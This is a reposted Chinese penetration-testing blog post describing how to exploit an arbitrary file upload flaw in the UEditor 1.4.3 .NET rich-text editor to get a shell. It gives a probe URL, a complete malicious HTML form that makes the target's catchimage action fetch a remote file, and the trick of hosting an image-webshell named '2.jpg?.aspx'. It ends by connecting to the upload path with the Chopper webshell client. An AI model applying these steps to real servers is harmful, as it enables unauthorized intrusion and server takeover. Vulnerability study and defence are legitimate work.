UEditor 1.4.3 任意文件上傳getshell

本文轉載自查看原文 2020-06-09 11:18 8391 web滲透

今天測試一個項目，進到后台之后發現使用富文本web編輯器

首先判斷下是否有這個漏洞

訪問如下鏈接 ： http://xxxxxxxxx/ueditor/net/controller.ashx?action=catchimage
如出現

則可嘗試漏洞利用

構造一個惡意的html文件，action的url是我們攻擊地址

<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">   <p>shell addr:<input type="text" name="source[]" /></p >   <inputtype="submit" value="Submit" />

</form>

然后制作一個圖片馬，文件名改為2.jpg?.aspx上傳至自己的服務器，通過構造的惡意html進行上傳

可以看到頁面返回狀態和地址

使用菜刀連接

http://xxxxxxxxx/ueditor/net/upload/image/xxxxxx   即可getshell

我的被安全設備攔截了

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 CKFinder 1.4.3 任意文件上傳漏洞 ueditor(v1.4.3)文件上傳getshell實戰復現通達OA任意文件上傳+文件包含GetShell/包含日志文件Getshell UEditor .net版本任意文件上傳 [代碼審計]XiaoCms（后台任意文件上傳至getshell,任意目錄刪除,會話固定漏洞）任意文件上傳從任意文件讀取到GetShell 通達OA11.6任意文件刪除+文件上傳組合GetShell 任意文件上傳漏洞任意文件讀取和上傳